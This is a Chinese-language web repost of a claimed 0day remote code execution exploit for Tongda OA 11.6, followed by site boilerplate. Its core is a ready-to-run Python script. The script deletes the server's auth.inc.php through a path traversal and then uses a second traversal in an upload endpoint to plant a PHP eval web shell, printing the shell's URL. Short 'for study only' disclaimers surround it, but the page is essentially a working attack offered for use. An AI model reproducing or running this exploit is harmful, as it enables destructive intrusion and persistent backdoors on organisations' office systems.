通达OA 最新0day RCE 漏洞 附带EXP

   日期:2020-08-20     浏览:172    评论:0    
核心提示:通达OA 最新0day RCE 漏洞关注时间,老版本不行新版的概率大,具体影响范围自行测试亲测存在exp利用脚本来源于网络禁止进行非法攻击仅用于工作和学习,禁止用于非法攻击,非法传播import requests target=http://127.0.0.1:8888/payload=print([*]Warning,This exploit code will DELETE auth.inc.php

通达OA 最新0day RCE 漏洞

此漏洞会删除文件 可能损坏OA系统
要有授权!别瞎搞和批量了

关注时间,老版本不行

11.6 版本可

具体影响范围自行测试

亲测存在

exp利用脚本

来源于网络

禁止进行非法攻击

仅用于工作和学习,禁止用于非法攻击,非法传播

import requests
 
target="http://127.0.0.1:8888/"
payload="<?php eval($_POST['test']);?>"
print("[*]Warning,This exploit code will DELETE auth.inc.php which may damage the OA")
input("Press enter to continue")
print("[*]Deleting auth.inc.php....")
 
url=target+"/module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php"
requests.get(url=url)
print("[*]Checking if file deleted...")
url=target+"/inc/auth.inc.php"
page=requests.get(url=url).text
if 'No input file specified.' not in page:
    print("[-]Failed to deleted auth.inc.php")
    exit(-1)
print("[+]Successfully deleted auth.inc.php!")
print("[*]Uploading payload...")
url=target+"/general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.<>./.<>./.<>./"
files = {'FILE1': ('test.php', payload)}
requests.post(url=url,files=files)
url=target+"/_test.php"
page=requests.get(url=url).text
if 'No input file specified.' not in page:
    print("[+]Filed Uploaded Successfully")
    print("[+]URL:",url)
else:
    print("[-]Failed to upload file")
 
打赏
 本文转载自:网络 
所有权利归属于原作者,如文章来源标示错误或侵犯了您的权利请联系微信13520258486
更多>最近资讯中心
更多>最新资讯中心
0相关评论

推荐图文
推荐资讯中心
点击排行
最新信息
新手指南
采购商服务
供应商服务
交易安全
关注我们
手机网站:
新浪微博:
微信关注:

13520258486

周一至周五 9:00-18:00
(其他时间联系在线客服)

24小时在线客服